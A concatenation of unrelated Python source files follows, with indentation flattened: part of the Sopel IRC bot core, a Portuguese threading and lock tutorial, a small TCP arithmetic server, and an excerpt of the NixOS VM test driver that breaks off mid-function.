stderr("Warning: Couldn't load any modules")
def unregister(self, obj):
if not callable(obj):
return
if hasattr(obj, 'rule'): # commands and intents have it added
for rule in obj.rule:
callb_list = self._callables[obj.priority][rule]
if obj in callb_list:
callb_list.remove(obj)
if hasattr(obj, 'interval'):
# TODO this should somehow find the right job to remove, rather than
# clearing the entire queue. Issue #831
self.scheduler.clear_jobs()
if (getattr(obj, '__name__', None) == 'shutdown' and
obj in self.shutdown_methods):
self.shutdown_methods.remove(obj)
def register(self, callables, jobs, shutdowns, urls):
# Append module's shutdown function to the bot's list of functions to
# call on shutdown
self.shutdown_methods += shutdowns
for callbl in callables:
if hasattr(callbl, 'rule'):
for rule in callbl.rule:
self._callables[callbl.priority][rule].append(callbl)
else:
self._callables[callbl.priority][re.compile('.*')].append(callbl)
if hasattr(callbl, 'commands'):
module_name = callbl.__module__.rsplit('.', 1)[-1]
# TODO doc and make decorator for this. Not sure if this is how
# it should work yet, so not making it public for 6.0.
category = getattr(callbl, 'category', module_name)
self._command_groups[category].append(callbl.commands[0])
for command, docs in callbl._docs.items():
self.doc[command] = docs
for func in jobs:
for interval in func.interval:
job = sopel.tools.jobs.Job(interval, func)
self.scheduler.add_job(job)
for func in urls:
self.register_url_callback(func.url_regex, func)
def part(self, channel, msg=None):
"""Part a channel."""
self.write(['PART', channel], msg)
def join(self, channel, password=None):
"""Join a channel
If `channel` contains a space, and no `password` is given, the space is
assumed to split the argument into the channel to join and its
password. `channel` should not contain a space if `password` is given.
"""
if password is None:
self.write(('JOIN', channel))
else:
self.write(['JOIN', channel, password])
def msg(self, recipient, text, max_messages=1):
# Deprecated, but way too much of a pain to remove.
self.say(text, recipient, max_messages)
def say(self, text, recipient, max_messages=1):
"""Send ``text`` as a PRIVMSG to ``recipient``.
In the context of a triggered callable, the ``recipient`` defaults to
the channel (or nickname, if a private message) from which the message
was received.
By default, this will attempt to send the entire ``text`` in one
message. If the text is too long for the server, it may be truncated.
If ``max_messages`` is given, the ``text`` will be split into at most
that many messages, each no more than 400 bytes. The split is made at
the last space character before the 400th byte, or at the 400th byte if
no such space exists. If the ``text`` is too long to fit into the
specified number of messages using the above splitting, the final
message will contain the entire remainder, which may be truncated by
the server.
"""
excess = ''
if not isinstance(text, unicode):
# Make sure we are dealing with unicode string
text = text.decode('utf-8')
if max_messages > 1:
# Manage multi-line only when needed
text, excess = tools.get_sendable_message(text)
try:
self.sending.acquire()
# No messages within the last 3 seconds? Go ahead!
# Otherwise, wait so it's been at least 0.8 seconds + penalty
recipient_id = Identifier(recipient)
if recipient_id not in self.stack:
self.stack[recipient_id] = []
elif self.stack[recipient_id]:
elapsed = time.time() - self.stack[recipient_id][-1][0]
if elapsed < 3:
penalty = float(max(0, len(text) - 40)) / 70
wait = 0.8 + penalty
if elapsed < wait:
time.sleep(wait - elapsed)
# Loop detection
messages = [m[1] for m in self.stack[recipient_id][-8:]]
# If what we about to send repeated at least 5 times in the
# last 2 minutes, replace with '...'
if messages.count(text) >= 5 and elapsed < 120:
text = '...'
if messages.count('...') >= 3:
# If we said '...' 3 times, discard message
return
self.write(('PRIVMSG', recipient), text)
self.stack[recipient_id].append((time.time(), self.safe(text)))
self.stack[recipient_id] = self.stack[recipient_id][-10:]
finally:
self.sending.release()
# Now that we've sent the first part, we need to send the rest. Doing
# this recursively seems easier to me than iteratively
if excess:
self.msg(recipient, excess, max_messages - 1)
def notice(self, text, dest):
"""Send an IRC NOTICE to a user or a channel.
Within the context of a triggered callable, ``dest`` will default to
the channel (or nickname, if a private message), in which the trigger
happened.
"""
self.write(('NOTICE', dest), text)
def action(self, text, dest):
"""Send ``text`` as a CTCP ACTION PRIVMSG to ``dest``.
The same loop detection and length restrictions apply as with
:func:`say`, though automatic message splitting is not available.
Within the context of a triggered callable, ``dest`` will default to
the channel (or nickname, if a private message), in which the trigger
happened.
"""
self.say('\001ACTION {}\001'.format(text), dest)
def reply(self, text, dest, reply_to, notice=False):
"""Prepend ``reply_to`` to ``text``, and send as a PRIVMSG to ``dest``.
If ``notice`` is ``True``, send a NOTICE rather than a PRIVMSG.
The same loop detection and length restrictions apply as with
:func:`say`, though automatic message splitting is not available.
Within the context of a triggered callable, ``reply_to`` will default to
the nickname of the user who triggered the call, and ``dest`` to the
channel (or nickname, if a private message), in which the trigger
happened.
"""
text = '%s: %s' % (reply_to, text)
if notice:
self.notice(text, dest)
else:
self.say(text, dest)
class SopelWrapper(object):
def __init__(self, sopel, trigger):
# The custom __setattr__ for this class sets the attribute on the
# original bot object. We don't want that for these, so we set them
# with the normal __setattr__.
object.__setattr__(self, '_bot', sopel)
object.__setattr__(self, '_trigger', trigger)
def __dir__(self):
classattrs = [attr for attr in self.__class__.__dict__
if not attr.startswith('__')]
return list(self.__dict__) + classattrs + dir(self._bot)
def __getattr__(self, attr):
return getattr(self._bot, attr)
def __setattr__(self, attr, value):
return setattr(self._bot, attr, value)
def say(self, message, destination=None, max_messages=1):
if destination is None:
destination = self._trigger.sender
self._bot.say(message, destination, max_messages)
def action(self, message, destination=None):
if destination is None:
destination = self._trigger.sender
self._bot.action(message, destination)
def notice(self, message, destination=None):
if destination is None:
destination = self._trigger.sender
self._bot.notice(message, destination)
def reply(self, message, destination=None, reply_to=None, notice=False):
if destination is None:
destination = self._trigger.sender
if reply_to is None:
reply_to = self._trigger.nick
self._bot.reply(message, destination, reply_to, notice)
def call(self, func, sopel, trigger):
nick = trigger.nick
current_time = time.time()
if nick not in self._times:
self._times[nick] = dict()
if self.nick not in self._times:
self._times[self.nick] = dict()
if not trigger.is_privmsg and trigger.sender not in self._times:
self._times[trigger.sender] = dict()
if not trigger.admin and not func.unblockable:
if func in self._times[nick]:
usertimediff = current_time - self._times[nick][func]
if func.rate > 0 and usertimediff < func.rate:
#self._times[nick][func] = current_time
LOGGER.info(
"%s prevented from using %s in %s due to user limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, usertimediff,
func.rate
)
return
if func in self._times[self.nick]:
globaltimediff = current_time - self._times[self.nick][func]
if func.global_rate > 0 and globaltimediff < func.global_rate:
#self._times[self.nick][func] = current_time
LOGGER.info(
"%s prevented from using %s in %s due to global limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, globaltimediff,
func.global_rate
)
return
if not trigger.is_privmsg and func in self._times[trigger.sender]:
chantimediff = current_time - self._times[trigger.sender][func]
if func.channel_rate > 0 and chantimediff < func.channel_rate:
#self._times[trigger.sender][func] = current_time
LOGGER.info(
"%s prevented from using %s in %s due to channel limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, chantimediff,
func.channel_rate
)
return
try:
exit_code = func(sopel, trigger)
except Exception: # TODO: Be specific
exit_code = None
self.error(trigger)
if exit_code != NOLIMIT:
self._times[nick][func] = current_time
self._times[self.nick][func] = current_time
if not trigger.is_privmsg:
self._times[trigger.sender][func] = current_time
def dispatch(self, pretrigger):
args = pretrigger.args
event, args, text = pretrigger.event, args, args[-1] if args else ''
if self.config.core.nick_blocks or self.config.core.host_blocks:
nick_blocked = self._nick_blocked(pretrigger.nick)
host_blocked = self._host_blocked(pretrigger.host)
else:
nick_blocked = host_blocked = None
list_of_blocked_functions = []
for priority in ('high', 'medium', 'low'):
items = self._callables[priority].items()
for regexp, funcs in items:
match = regexp.match(text)
if not match:
continue
user_obj = self.users.get(pretrigger.nick)
account = user_obj.account if user_obj else None
trigger = Trigger(self.config, pretrigger, match, account)
wrapper = self.SopelWrapper(self, trigger)
for func in funcs:
if (not trigger.admin and
not func.unblockable and
(nick_blocked or host_blocked)):
function_name = "%s.%s" % (
func.__module__, func.__name__
)
list_of_blocked_functions.append(function_name)
continue
if event not in func.event:
continue
if hasattr(func, 'intents'):
if not trigger.tags.get('intent'):
continue
match = False
for intent in func.intents:
if intent.match(trigger.tags.get('intent')):
match = True
if not match:
continue
if func.thread:
targs = (func, wrapper, trigger)
t = threading.Thread(target=self.call, args=targs)
t.start()
else:
self.call(func, wrapper, trigger)
if list_of_blocked_functions:
if nick_blocked and host_blocked:
block_type = 'both'
elif nick_blocked:
block_type = 'nick'
else:
block_type = 'host'
LOGGER.info(
"[%s]%s prevented from using %s.",
block_type,
trigger.nick,
', '.join(list_of_blocked_functions)
)
def _host_blocked(self, host):
bad_masks = self.config.core.host_blocks
for bad_mask in bad_masks:
bad_mask = bad_mask.strip()
if not bad_mask:
continue
if (re.match(bad_mask + '$', host, re.IGNORECASE) or
bad_mask == host):
return True
return False
def _nick_blocked(self, nick):
bad_nicks = self.config.core.nick_blocks
for bad_nick in bad_nicks:
bad_nick = bad_nick.strip()
if not bad_nick:
continue
if (re.match(bad_nick + '$', nick, re.IGNORECASE) or
Identifier(bad_nick) == nick):
return True
return False
def _shutdown(self):
stderr(
'Calling shutdown for %d modules.' % (len(self.shutdown_methods),)
)
for shutdown_method in self.shutdown_methods:
try:
stderr(
"calling %s.%s" % (
shutdown_method.__module__, shutdown_method.__name__,
)
)
shutdown_method(self)
except Exception as e:
stderr(
"Error calling shutdown method for module %s:%s" % (
shutdown_method.__module__, e
)
)
# Avoid calling shutdown methods if we already have.
self.shutdown_methods = []
def cap_req(self, module_name, capability, arg=None, failure_callback=None,
success_callback=None):
"""Tell Sopel to request a capability when it starts.
By prefixing the capability with `-`, it will be ensured that the
capability is not enabled. Simmilarly, by prefixing the capability with
`=`, it will be ensured that the capability is enabled. Requiring and
disabling is "first come, first served"; if one module requires a
capability, and another prohibits it, this function will raise an
exception in whichever module loads second. An exception will also be
raised if the module is being loaded after the bot has already started,
and the request would change the set of enabled capabilities.
If the capability is not prefixed, and no other module prohibits it, it
will be requested. Otherwise, it will not be requested. Since
capability requests that are not mandatory may be rejected by the
server, as well as by other modules, a module which makes such a
request should account for that possibility.
The actual capability request to the server is handled after the
completion of this function. In the event that the server denies a
request, the `failure_callback` function will be called, if provided.
The arguments will be a `Sopel` object, and the capability which was
rejected. This can be used to disable callables which rely on the
capability. It will be be called either if the server NAKs the request,
or if the server enabled it and later DELs it.
The `success_callback` function will be called upon acknowledgement of
the capability from the server, whether during the initial capability
negotiation, or later.
If ``arg`` is given, and does not exactly match what the server
provides or what other modules have requested for that capability, it is
considered a conflict.
"""
# TODO raise better exceptions
cap = capability[1:]
prefix = capability[0]
entry = self._cap_reqs.get(cap, [])
if any((ent.arg != arg for ent in entry)):
raise Exception('Capability conflict')
if prefix == '-':
if self.connection_registered and cap in self.enabled_capabilities:
raise Exception('Can not change capabilities after server '
'connection has been completed.')
if any((ent.prefix != '-' for ent in entry)):
raise Exception('Capability conflict')
entry.append(_CapReq(prefix, module_name, failure_callback, arg,
success_callback))
self._cap_reqs[cap] = entry
else:
if prefix != '=':
cap = capability
prefix = ''
if self.connection_registered and (cap not in
self.enabled_capabilities):
raise Exception('Can not change capabilities after server '
'connection has been completed.')
# Non-mandatory will callback at the same time as if the server
# rejected it.
if any((ent.prefix == '-' for ent in entry)) and prefix == '=':
raise Exception('Capability conflict')
entry.append(_CapReq(prefix, module_name, failure_callback, arg,
success_callback))
self._cap_reqs[cap] = entry
def register_url_callback(self, pattern, callback):
"""Register a ``callback`` for URLs matching the regex ``pattern``
:param pattern: compiled regex pattern to register
:param callback: callable object to handle matching URLs
.. versionadded:: 7.0
This method replaces manual management of ``url_callbacks`` in
Sopel's plugins, so instead of doing this in ``setup()``::
if not bot.memory.contains('url_callbacks'):
bot.memory['url_callbacks'] = tools.SopelMemory()
regex = re.compile(r'http://example.com/path/.*')
bot.memory['url_callbacks'][regex] = callback
use this much more concise pattern::
regex = re.compile(r'http://example.com/path/.*')
bot.register_url_callback(regex, callback)
"""
if not self.memory.contains('url_callbacks'):
self.memory['url_callbacks'] = tools.SopelMemory()
if isinstance(pattern, basestring):
pattern = re.compile(pattern)
self.memory['url_callbacks'][pattern] = callback
def unregister_url_callback(self, pattern):
"""Unregister the callback for URLs matching the regex ``pattern``
:param pattern: compiled regex pattern to unregister callback
.. versionadded:: 7.0
This method replaces manual management of ``url_callbacks`` in
Sopel's plugins, so instead of doing this in ``shutdown()``::
regex = re.compile(r'http://example.com/path/.*')
try:
del bot.memory['url_callbacks'][regex]
except KeyError:
pass
use this much more concise pattern::
regex = re.compile(r'http://example.com/path/.*')
bot.unregister_url_callback(regex)
"""
if not self.memory.contains('url_callbacks'):
# nothing to unregister
return
if isinstance(pattern, basestring):
pattern = re.compile(pattern)
try:
del self.memory['url_callbacks'][pattern]
except KeyError:
pass
def search_url_callbacks(self, url):
"""Yield callbacks found for ``url`` matching their regex pattern
:param str url: URL found in a trigger
:return: yield 2-value tuples of ``(callback, match)``
For each pattern that matches the ``url`` parameter, it yields a
2-value tuple of ``(callable, match)`` for that pattern.
The ``callable`` is the one registered with
:meth:`register_url_callback`, and the ``match`` is the result of
the regex pattern's ``search`` method.
.. versionadded:: 7.0
.. seealso::
The Python documentation for the `re.search`__ function and
the `match object`__.
.. __: https://docs.python.org/3.6/library/re.html#re.search
.. __: https://docs.python.org/3.6/library/re.html#match-objects
"""
for regex, function in tools.iteritems(self.memory['url_callbacks']):
match = regex.search(url)
if match:
yield function, match
|
main.py | from time import sleep
from threading import Thread
from threading import Lock
"""
class MeuThread(Thread):
def __init__(self, texto, tempo):
self.texto = texto
self.tempo = tempo
super().__init__()
def run(self):
sleep(self.tempo)
print(self.texto)
t1 = MeuThread('Thread 1', 5)
t1.start()
t2 = MeuThread('Thread 2', 3)
t2.start()
t3 = MeuThread('Thread 3', 2)
t3.start()
for i in range(20):
print(i)
sleep(1)
"""
"""
def vai_demorar(texto, tempo):
sleep(tempo)
print(texto)
t1 = Thread(target=vai_demorar, args=('Olá mundo 1!', 5))
t1.start()
t2 = Thread(target=vai_demorar, args=('Olá mundo 2!', 1))
t2.start()
t3 = Thread(target=vai_demorar, args=('Olá mundo 3!', 2))
t3.start()
for i in range(20):
print(i)
sleep(.5)
"""
"""
def vai_demorar(texto, tempo):
sleep(tempo)
print(texto)
t1 = Thread(target=vai_demorar, args=('Olá mundo 1!', 10))
t1.start()
t1.join()
print('Thread acabou!')
"""
"""
def vai_demorar(texto, tempo):
sleep(tempo)
print(texto)
t1 = Thread(target=vai_demorar, args=('ola mundo 1', 10))
t1.start()
# verifica se a thread ainda esta rodando
while t1.is_alive():
print('Esperando a thread...')
sleep(2)
print('Thread acabou!')
"""
class Ingressos:
"""
Classe que vende ingressos
"""
def __init__(self, estoque):
""" Inicializando...
:param estoque: quantidade de ingressos em estoque
"""
self.estoque = estoque
# Nosso cadeado
self.lock = Lock()
def comprar(self, quantidade):
"""
Compra determinada quantidade de ingressos
:param quantidade: A quantidade de ingressos que deseja comprar
:type quantidade: int
:return: Nada
:rtype: None
"""
# Tranca o método
self.lock.acquire()
if self.estoque < quantidade:
print('Não temos ingressos suficientes.')
# Libera o método
self.lock.release()
return
sleep(1)
self.estoque -= quantidade
print(f'Você comprou {quantidade} ingresso(s). '
f'Ainda temos {self.estoque} em estoque.')
# Libera o método
self.lock.release()
if __name__ == '__main__':
ingressos = Ingressos(10)
threads = [] # Lista para manter as threads
for i in range(1, 20):
t = Thread(target=ingressos.comprar, args=(i,))
threads.append(t)
# Inicia as threads
for t in threads:
t.start()
# Verifica se todas as threads terminaram
executando = True
while executando:
executando = False
for t in threads:
if t.is_alive():
executando = True
break
print(ingressos.estoque)
|
sub_server.py | import socket
import sys
import lib.ProtocolUtils as protocolUtils
import threading as thread
def message_handler(conn, addr):
data = protocolUtils.MessageHandler(conn.recv(1024)).message_loads()
print("New operation in queue ", data[0], " ", data[2])
try:
result = str(float(data[0]) - float(data[2]))
except ValueError:
result = "The operands requires be numbers"
conn.send(result.encode())
# Close the thread to save hardware.
# sys.exit()
if __name__ == "__main__":
socket_instance = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket_instance.bind(('', 9992))
socket_instance.listen(10)
threads_list = []
print("Add Server running ...")
while True:
conn, addr = socket_instance.accept()
temp_thread = thread.Thread(target=message_handler, args=(conn, addr,))
threads_list.append(temp_thread)
temp_thread.start()
|
test-driver.py | #! /somewhere/python3
from contextlib import contextmanager, _GeneratorContextManager
from queue import Queue, Empty
from typing import Tuple, Any, Callable, Dict, Iterator, Optional, List, Iterable
from xml.sax.saxutils import XMLGenerator
from colorama import Style
from pathlib import Path
import queue
import io
import threading
import argparse
import base64
import codecs
import os
import ptpython.repl
import pty
import re
import shlex
import shutil
import socket
import subprocess
import sys
import tempfile
import time
import unicodedata
CHAR_TO_KEY = {
"A": "shift-a",
"N": "shift-n",
"-": "0x0C",
"_": "shift-0x0C",
"B": "shift-b",
"O": "shift-o",
"=": "0x0D",
"+": "shift-0x0D",
"C": "shift-c",
"P": "shift-p",
"[": "0x1A",
"{": "shift-0x1A",
"D": "shift-d",
"Q": "shift-q",
"]": "0x1B",
"}": "shift-0x1B",
"E": "shift-e",
"R": "shift-r",
";": "0x27",
":": "shift-0x27",
"F": "shift-f",
"S": "shift-s",
"'": "0x28",
'"': "shift-0x28",
"G": "shift-g",
"T": "shift-t",
"`": "0x29",
"~": "shift-0x29",
"H": "shift-h",
"U": "shift-u",
"\\": "0x2B",
"|": "shift-0x2B",
"I": "shift-i",
"V": "shift-v",
",": "0x33",
"<": "shift-0x33",
"J": "shift-j",
"W": "shift-w",
".": "0x34",
">": "shift-0x34",
"K": "shift-k",
"X": "shift-x",
"/": "0x35",
"?": "shift-0x35",
"L": "shift-l",
"Y": "shift-y",
" ": "spc",
"M": "shift-m",
"Z": "shift-z",
"\n": "ret",
"!": "shift-0x02",
"@": "shift-0x03",
"#": "shift-0x04",
"$": "shift-0x05",
"%": "shift-0x06",
"^": "shift-0x07",
"&": "shift-0x08",
"*": "shift-0x09",
"(": "shift-0x0A",
")": "shift-0x0B",
}
class Logger:
def __init__(self) -> None:
self.logfile = os.environ.get("LOGFILE", "/dev/null")
self.logfile_handle = codecs.open(self.logfile, "wb")
self.xml = XMLGenerator(self.logfile_handle, encoding="utf-8")
self.queue: "Queue[Dict[str, str]]" = Queue()
self.xml.startDocument()
self.xml.startElement("logfile", attrs={})
self._print_serial_logs = True
@staticmethod
def _eprint(*args: object, **kwargs: Any) -> None:
print(*args, file=sys.stderr, **kwargs)
def close(self) -> None:
self.xml.endElement("logfile")
self.xml.endDocument()
self.logfile_handle.close()
def sanitise(self, message: str) -> str:
return "".join(ch for ch in message if unicodedata.category(ch)[0] != "C")
def maybe_prefix(self, message: str, attributes: Dict[str, str]) -> str:
if "machine" in attributes:
return "{}: {}".format(attributes["machine"], message)
return message
def log_line(self, message: str, attributes: Dict[str, str]) -> None:
self.xml.startElement("line", attributes)
self.xml.characters(message)
self.xml.endElement("line")
def info(self, *args, **kwargs) -> None: # type: ignore
self.log(*args, **kwargs)
def warning(self, *args, **kwargs) -> None: # type: ignore
self.log(*args, **kwargs)
def error(self, *args, **kwargs) -> None: # type: ignore
self.log(*args, **kwargs)
sys.exit(1)
def log(self, message: str, attributes: Dict[str, str] = {}) -> None:
self._eprint(self.maybe_prefix(message, attributes))
self.drain_log_queue()
self.log_line(message, attributes)
def log_serial(self, message: str, machine: str) -> None:
self.enqueue({"msg": message, "machine": machine, "type": "serial"})
if self._print_serial_logs:
self._eprint(
Style.DIM + "{} # {}".format(machine, message) + Style.RESET_ALL
)
def enqueue(self, item: Dict[str, str]) -> None:
self.queue.put(item)
def drain_log_queue(self) -> None:
try:
while True:
item = self.queue.get_nowait()
msg = self.sanitise(item["msg"])
del item["msg"]
self.log_line(msg, item)
except Empty:
pass
@contextmanager
def nested(self, message: str, attributes: Dict[str, str] = {}) -> Iterator[None]:
self._eprint(self.maybe_prefix(message, attributes))
self.xml.startElement("nest", attrs={})
self.xml.startElement("head", attributes)
self.xml.characters(message)
self.xml.endElement("head")
tic = time.time()
self.drain_log_queue()
yield
self.drain_log_queue()
toc = time.time()
self.log("({:.2f} seconds)".format(toc - tic))
self.xml.endElement("nest")
rootlog = Logger()
def make_command(args: list) -> str:
return " ".join(map(shlex.quote, (map(str, args))))
def retry(fn: Callable, timeout: int = 900) -> None:
"""Call the given function repeatedly, with 1 second intervals,
until it returns True or a timeout is reached.
"""
for _ in range(timeout):
if fn(False):
return
time.sleep(1)
if not fn(True):
raise Exception(f"action timed out after {timeout} seconds")
def _perform_ocr_on_screenshot(
screenshot_path: str, model_ids: Iterable[int]
) -> List[str]:
if shutil.which("tesseract") is None:
raise Exception("OCR requested but enableOCR is false")
magick_args = (
"-filter Catrom -density 72 -resample 300 "
+ "-contrast -normalize -despeckle -type grayscale "
+ "-sharpen 1 -posterize 3 -negate -gamma 100 "
+ "-blur 1x65535"
)
tess_args = f"-c debug_file=/dev/null --psm 11"
cmd = f"convert {magick_args} {screenshot_path} tiff:{screenshot_path}.tiff"
ret = subprocess.run(cmd, shell=True, capture_output=True)
if ret.returncode != 0:
raise Exception(f"TIFF conversion failed with exit code {ret.returncode}")
model_results = []
for model_id in model_ids:
cmd = f"tesseract {screenshot_path}.tiff - {tess_args} --oem {model_id}"
ret = subprocess.run(cmd, shell=True, capture_output=True)
if ret.returncode != 0:
raise Exception(f"OCR failed with exit code {ret.returncode}")
model_results.append(ret.stdout.decode("utf-8"))
return model_results
class StartCommand:
"""The Base Start Command knows how to append the necesary
runtime qemu options as determined by a particular test driver
run. Any such start command is expected to happily receive and
append additional qemu args.
"""
_cmd: str
def cmd(
self,
monitor_socket_path: Path,
shell_socket_path: Path,
allow_reboot: bool = False, # TODO: unused, legacy?
) -> str:
display_opts = ""
display_available = any(x in os.environ for x in ["DISPLAY", "WAYLAND_DISPLAY"])
if not display_available:
display_opts += " -nographic"
# qemu options
qemu_opts = ""
qemu_opts += (
""
if allow_reboot
else " -no-reboot"
" -device virtio-serial"
" -device virtconsole,chardev=shell"
" -device virtio-rng-pci"
" -serial stdio"
)
# TODO: qemu script already catpures this env variable, legacy?
qemu_opts += " " + os.environ.get("QEMU_OPTS", "")
return (
f"{self._cmd}"
f" -monitor unix:{monitor_socket_path}"
f" -chardev socket,id=shell,path={shell_socket_path}"
f"{qemu_opts}"
f"{display_opts}"
)
@staticmethod
def build_environment(
state_dir: Path,
shared_dir: Path,
) -> dict:
# We make a copy to not update the current environment
env = dict(os.environ)
env.update(
{
"TMPDIR": str(state_dir),
"SHARED_DIR": str(shared_dir),
"USE_TMPDIR": "1",
}
)
return env
def run(
self,
state_dir: Path,
shared_dir: Path,
monitor_socket_path: Path,
shell_socket_path: Path,
) -> subprocess.Popen:
return subprocess.Popen(
self.cmd(monitor_socket_path, shell_socket_path),
stdin=subprocess.DEVNULL,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=True,
cwd=state_dir,
env=self.build_environment(state_dir, shared_dir),
)
class NixStartScript(StartCommand):
"""A start script from nixos/modules/virtualiation/qemu-vm.nix
that also satisfies the requirement of the BaseStartCommand.
These Nix commands have the particular charactersitic that the
machine name can be extracted out of them via a regex match.
(Admittedly a _very_ implicit contract, evtl. TODO fix)
"""
def __init__(self, script: str):
self._cmd = script
@property
def machine_name(self) -> str:
match = re.search("run-(.+)-vm$", self._cmd)
name = "machine"
if match:
name = match.group(1)
return name
class LegacyStartCommand(StartCommand):
"""Used in some places to create an ad-hoc machine instead of
using nix test instrumentation + module system for that purpose.
Legacy.
"""
def __init__(
self,
netBackendArgs: Optional[str] = None,
netFrontendArgs: Optional[str] = None,
hda: Optional[Tuple[Path, str]] = None,
cdrom: Optional[str] = None,
usb: Optional[str] = None,
bios: Optional[str] = None,
qemuFlags: Optional[str] = None,
):
self._cmd = "qemu-kvm -m 384"
# networking
net_backend = "-netdev user,id=net0"
net_frontend = "-device virtio-net-pci,netdev=net0"
if netBackendArgs is not None:
net_backend += "," + netBackendArgs
if netFrontendArgs is not None:
net_frontend += "," + netFrontendArgs
self._cmd += f" {net_backend} {net_frontend}"
# hda
hda_cmd = ""
if hda is not None:
hda_path = hda[0].resolve()
hda_interface = hda[1]
if hda_interface == "scsi":
hda_cmd += (
f" -drive id=hda,file={hda_path},werror=report,if=none"
" -device scsi-hd,drive=hda"
)
else:
hda_cmd += f" -drive file={hda_path},if={hda_interface},werror=report"
self._cmd += hda_cmd
# cdrom
if cdrom is not None:
self._cmd += f" -cdrom {cdrom}"
# usb
usb_cmd = ""
if usb is not None:
# https://github.com/qemu/qemu/blob/master/docs/usb2.txt
usb_cmd += (
" -device usb-ehci"
f" -drive id=usbdisk,file={usb},if=none,readonly"
" -device usb-storage,drive=usbdisk "
)
self._cmd += usb_cmd
# bios
if bios is not None:
self._cmd += f" -bios {bios}"
# qemu flags
if qemuFlags is not None:
self._cmd += f" {qemuFlags}"
class Machine:
"""A handle to the machine with this name, that also knows how to manage
the machine lifecycle with the help of a start script / command."""
name: str
tmp_dir: Path
shared_dir: Path
state_dir: Path
monitor_path: Path
shell_path: Path
start_command: StartCommand
keep_vm_state: bool
allow_reboot: bool
process: Optional[subprocess.Popen]
pid: Optional[int]
monitor: Optional[socket.socket]
shell: Optional[socket.socket]
serial_thread: Optional[threading.Thread]
booted: bool
connected: bool
# Store last serial console lines for use
# of wait_for_console_text
last_lines: Queue = Queue()
def __repr__(self) -> str:
return f"<Machine '{self.name}'>"
def __init__(
self,
tmp_dir: Path,
start_command: StartCommand,
name: str = "machine",
keep_vm_state: bool = False,
allow_reboot: bool = False,
) -> None:
self.tmp_dir = tmp_dir
self.keep_vm_state = keep_vm_state
self.allow_reboot = allow_reboot
self.name = name
self.start_command = start_command
# set up directories
self.shared_dir = self.tmp_dir / "shared-xchg"
self.shared_dir.mkdir(mode=0o700, exist_ok=True)
self.state_dir = self.tmp_dir / f"vm-state-{self.name}"
self.monitor_path = self.state_dir / "monitor"
self.shell_path = self.state_dir / "shell"
if (not self.keep_vm_state) and self.state_dir.exists():
self.cleanup_statedir()
self.state_dir.mkdir(mode=0o700, exist_ok=True)
self.process = None
self.pid = None
self.monitor = None
self.shell = None
self.serial_thread = None
self.booted = False
self.connected = False
@staticmethod
def create_startcommand(args: Dict[str, str]) -> StartCommand:
rootlog.warning(
"Using legacy create_startcommand(),"
"please use proper nix test vm instrumentation, instead"
"to generate the appropriate nixos test vm qemu startup script"
)
hda = None
if args.get("hda"):
hda_arg: str = args.get("hda", "")
hda_arg_path: Path = Path(hda_arg)
hda = (hda_arg_path, args.get("hdaInterface", ""))
return LegacyStartCommand(
netBackendArgs=args.get("netBackendArgs"),
netFrontendArgs=args.get("netFrontendArgs"),
hda=hda,
cdrom=args.get("cdrom"),
usb=args.get("usb"),
bios=args.get("bios"),
qemuFlags=args.get("qemuFlags"),
)
def is_up(self) -> bool:
return self.booted and self.connected
def log(self, msg: str) -> None:
rootlog.log(msg, {"machine": self.name})
def log_serial(self, msg: str) -> None:
rootlog.log_serial(msg, self.name)
def nested(self, msg: str, attrs: Dict[str, str] = {}) -> _GeneratorContextManager:
my_attrs = {"machine": self.name}
my_attrs.update(attrs)
return rootlog.nested(msg, my_attrs)
def wait_for_monitor_prompt(self) -> str:
assert self.monitor is not None
answer = ""
while True:
undecoded_answer = self.monitor.recv(1024)
if not undecoded_answer:
break
answer += undecoded_answer.decode()
if answer.endswith("(qemu) "):
break
return answer
def send_monitor_command(self, command: str) -> str:
message = ("{}\n".format(command)).encode()
self.log("sending monitor command: {}".format(command))
assert self.monitor is not None
self.monitor.send(message)
return self.wait_for_monitor_prompt()
def wait_for_unit(self, unit: str, user: Optional[str] = None) -> None:
"""Wait for a systemd unit to get into "active" state.
Throws exceptions on "failed" and "inactive" states as well as
after timing out.
"""
def check_active(_: Any) -> bool:
info = self.get_unit_info(unit, user)
state = info["ActiveState"]
if state == "failed":
raise Exception('unit "{}" reached state "{}"'.format(unit, state))
if state == "inactive":
status, jobs = self.systemctl("list-jobs --full 2>&1", user)
if "No jobs" in jobs:
info = self.get_unit_info(unit, user)
if info["ActiveState"] == state:
raise Exception(
(
'unit "{}" is inactive and there ' "are no pending jobs"
).format(unit)
)
return state == "active"
retry(check_active)
def get_unit_info(self, unit: str, user: Optional[str] = None) -> Dict[str, str]:
status, lines = self.systemctl('--no-pager show "{}"'.format(unit), user)
if status != 0:
raise Exception(
'retrieving systemctl info for unit "{}" {} failed with exit code {}'.format(
unit, "" if user is None else 'under user "{}"'.format(user), status
)
)
line_pattern = re.compile(r"^([^=]+)=(.*)$")
def tuple_from_line(line: str) -> Tuple[str, str]:
match = line_pattern.match(line)
assert match is not None
return match[1], match[2]
return dict(
tuple_from_line(line)
for line in lines.split("\n")
if line_pattern.match(line)
)
def systemctl(self, q: str, user: Optional[str] = None) -> Tuple[int, str]:
if user is not None:
q = q.replace("'", "\\'")
return self.execute(
(
"su -l {} --shell /bin/sh -c "
"$'XDG_RUNTIME_DIR=/run/user/`id -u` "
"systemctl --user {}'"
).format(user, q)
)
return self.execute("systemctl {}".format(q))
def require_unit_state(self, unit: str, require_state: str = "active") -> None:
with self.nested(
"checking if unit ‘{}’ has reached state '{}'".format(unit, require_state)
):
info = self.get_unit_info(unit)
state = info["ActiveState"]
if state != require_state:
raise Exception(
"Expected unit ‘{}’ to to be in state ".format(unit)
+ "'{}' but it is in state ‘{}’".format(require_state, state)
)
def _next_newline_closed_block_from_shell(self) -> str:
assert self.shell
output_buffer = []
while True:
# This receives up to 4096 bytes from the socket
chunk = self.shell.recv(4096)
if not chunk:
# Probably a broken pipe, return the output we have
break
decoded = chunk.decode()
output_buffer += [decoded]
if decoded[-1] == "\n":
break
return "".join(output_buffer)
def execute(self, command: str, check_return: bool = True) -> Tuple[int, str]:
self.connect()
out_command = f"( set -euo pipefail; {command} ) | (base64 --wrap 0; echo)\n"
assert self.shell
self.shell.send(out_command.encode())
# Get the output
output = base64.b64decode(self._next_newline_closed_block_from_shell())
if not check_return:
return (-1, output.decode())
# Get the return code
self.shell.send("echo ${PIPESTATUS[0]}\n".encode())
